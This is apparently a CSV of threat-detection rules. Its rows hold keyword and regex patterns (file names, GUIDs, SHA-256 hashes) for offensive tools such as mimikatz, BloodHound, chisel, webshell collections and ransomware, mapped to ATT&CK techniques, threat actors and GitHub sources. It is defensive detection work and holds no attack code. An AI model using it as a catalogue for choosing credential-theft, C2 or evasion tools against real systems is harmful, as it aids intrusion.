"*AzureADLateralMovement*",".{0,1000}AzureADLateralMovement.{0,1000}","offensive_tool_keyword","AzureADLateralMovement","AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing Lateral Movement graph data compatible with Bloodhound 2.2.0","T1074 - T1075 - T1076","TA0008 - TA0009 - TA0010","N/A","N/A","Lateral Movement","https://github.com/talmaor/AzureADLateralMovement","1","1","N/A","N/A","N/A","2","122","22","2022-12-08T06:44:48Z","2019-06-22T06:13:28Z","34401"
"*AzureADRecon.ps1*",".{0,1000}AzureADRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","34402"
"*AzureC2Relay.zip*",".{0,1000}AzureC2Relay\.zip.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","34403"
"*AzureC2Relay-main*",".{0,1000}AzureC2Relay\-main.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","34404"
"*AzureHound.ps1*",".{0,1000}AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34405"
"*azurehound/v2*",".{0,1000}azurehound\/v2.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34406"
"*-b bleeding-jumbo*",".{0,1000}\-b\sbleeding\-jumbo.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34407"
"*'B','e','a','c','o','n'*",".{0,1000}\'B\',\'e\',\'a\',\'c\',\'o\',\'n\'.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","34408"
"*B00DC126-D32B-429F-9BB5-97AF33BEE0E1*",".{0,1000}B00DC126\-D32B\-429F\-9BB5\-97AF33BEE0E1.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#GUIDproject","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","34411"
"*b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e*",".{0,1000}b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34413"
"*b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e*",".{0,1000}b016e0fb93032d4ab6f2fb2ec6388e3117442d836bed2fe38ae8b73d7b825c5e.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34414"
"*b01d196f7d55bb7eb688d1f72d3d238ac95a4822e6712e197f816245d6eadf75*",".{0,1000}b01d196f7d55bb7eb688d1f72d3d238ac95a4822e6712e197f816245d6eadf75.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","34415"
"*b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965*",".{0,1000}b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34417"
"*B03A3AF9-9448-43FE-8CEE-5A2C43BFAC86*",".{0,1000}B03A3AF9\-9448\-43FE\-8CEE\-5A2C43BFAC86.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","#GUIDproject","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","34418"
"*b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb*",".{0,1000}b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34421"
"*b054a5cc8d12e9fedf59d13d0a087f64f598ce4486d35c888b40a2c3d7adf9c5*",".{0,1000}b054a5cc8d12e9fedf59d13d0a087f64f598ce4486d35c888b40a2c3d7adf9c5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34422"
"*b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8*",".{0,1000}b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34423"
"*b05d1b0ab92d9c5cfb3f0db593cc55ba5a4c22dea4cdf731ca8b934a45163ab8*",".{0,1000}b05d1b0ab92d9c5cfb3f0db593cc55ba5a4c22dea4cdf731ca8b934a45163ab8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34424"
"*b0740ed4a5a0d32d2d4081fc2875b6006c8920794463f36e467ac00bcb294d33*",".{0,1000}b0740ed4a5a0d32d2d4081fc2875b6006c8920794463f36e467ac00bcb294d33.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34427"
"*b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4*",".{0,1000}b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34428"
"*b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32*",".{0,1000}b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34431"
"*b095b574cadcf9fc517eedd434df402bdbf680f19ebe0c1298dd8f0818dfe5e8*",".{0,1000}b095b574cadcf9fc517eedd434df402bdbf680f19ebe0c1298dd8f0818dfe5e8.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","34434"
"*b096ce8b9397269012bccaef5a419211cb74d1157d4340453a3a39b68da7cf10*",".{0,1000}b096ce8b9397269012bccaef5a419211cb74d1157d4340453a3a39b68da7cf10.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","#filehash","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","34437"
"*b0975e541e34e247e2312f7acc58d9734fbbdc4cda5137e85b3c215c2737f76c*",".{0,1000}b0975e541e34e247e2312f7acc58d9734fbbdc4cda5137e85b3c215c2737f76c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34438"
"*b098cae09f215cc8ab24cb98bf217ae55a61704fe0661847341a11656368c7ca*",".{0,1000}b098cae09f215cc8ab24cb98bf217ae55a61704fe0661847341a11656368c7ca.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34439"
"*b09a40f998e8bc112841842ed56d8e843e5df98f4b53657098924fd10325a4b9*",".{0,1000}b09a40f998e8bc112841842ed56d8e843e5df98f4b53657098924fd10325a4b9.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","#filehash","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","34440"
"*b09adb4d79fd71cba1d5c51c514d4a10e08f92fed9eca3637a2f68d6c2f8e835*",".{0,1000}b09adb4d79fd71cba1d5c51c514d4a10e08f92fed9eca3637a2f68d6c2f8e835.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34441"
"*b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b*",".{0,1000}b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34444"
"*b0b6fc7655489a38277889cc4a101e8832b49b08e754110bdba599c6c4c9b6ed*",".{0,1000}b0b6fc7655489a38277889cc4a101e8832b49b08e754110bdba599c6c4c9b6ed.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","34445"
"*B0C08C11-23C4-495F-B40B-14066F12FAAB*",".{0,1000}B0C08C11\-23C4\-495F\-B40B\-14066F12FAAB.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#GUIDproject","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","34446"
"*b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810*",".{0,1000}b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#filehash","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","34448"
"*b0ce61e1952c8156f693be914ac22b377db2c68c0485d38e6dfefa921400dd82*",".{0,1000}b0ce61e1952c8156f693be914ac22b377db2c68c0485d38e6dfefa921400dd82.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","34449"
"*b0cef23396325be6652587249d65dbcd53571dc6928350ea297f99ef1b58f920*",".{0,1000}b0cef23396325be6652587249d65dbcd53571dc6928350ea297f99ef1b58f920.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34450"
"*b0cf4ccee3c06fe7d3c7ff2afbfefbe972f82008ec5b2f8a5e5d5cb9a58861a2*",".{0,1000}b0cf4ccee3c06fe7d3c7ff2afbfefbe972f82008ec5b2f8a5e5d5cb9a58861a2.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","34451"
"*b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb*",".{0,1000}b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34453"
"*b0dfaa9226786fa467d758760aa766da96b58baac3e7fa446c6870959d6c4602*",".{0,1000}b0dfaa9226786fa467d758760aa766da96b58baac3e7fa446c6870959d6c4602.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34456"
"*b0e02a08da80d249cd96bda183d2910fc02c55ffa72cae261496d520e857a5ed*",".{0,1000}b0e02a08da80d249cd96bda183d2910fc02c55ffa72cae261496d520e857a5ed.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34457"
"*b0e1039ae0d67bf914c268cfb9ca01b11aaa76a7af1560cf16ca5b52ecff0f96*",".{0,1000}b0e1039ae0d67bf914c268cfb9ca01b11aaa76a7af1560cf16ca5b52ecff0f96.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","34458"
"*b0e4d0a411c1fcf8dad9ca13c9e69660f6f10079d4db982db2167a457ec1e2ce*",".{0,1000}b0e4d0a411c1fcf8dad9ca13c9e69660f6f10079d4db982db2167a457ec1e2ce.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","34459"
"*b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451*",".{0,1000}b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34460"
"*b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453*",".{0,1000}b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34461"
"*b1082c41fdd489f5b40bb413e94a37f86f30a0665771f2d1c36943d9f0cfe06e*",".{0,1000}b1082c41fdd489f5b40bb413e94a37f86f30a0665771f2d1c36943d9f0cfe06e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34464"
"*b10dd21ee337c753a9056e9ac2c0b5d6912a5a39e7ef1ee618a91297286e4d39*",".{0,1000}b10dd21ee337c753a9056e9ac2c0b5d6912a5a39e7ef1ee618a91297286e4d39.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34466"
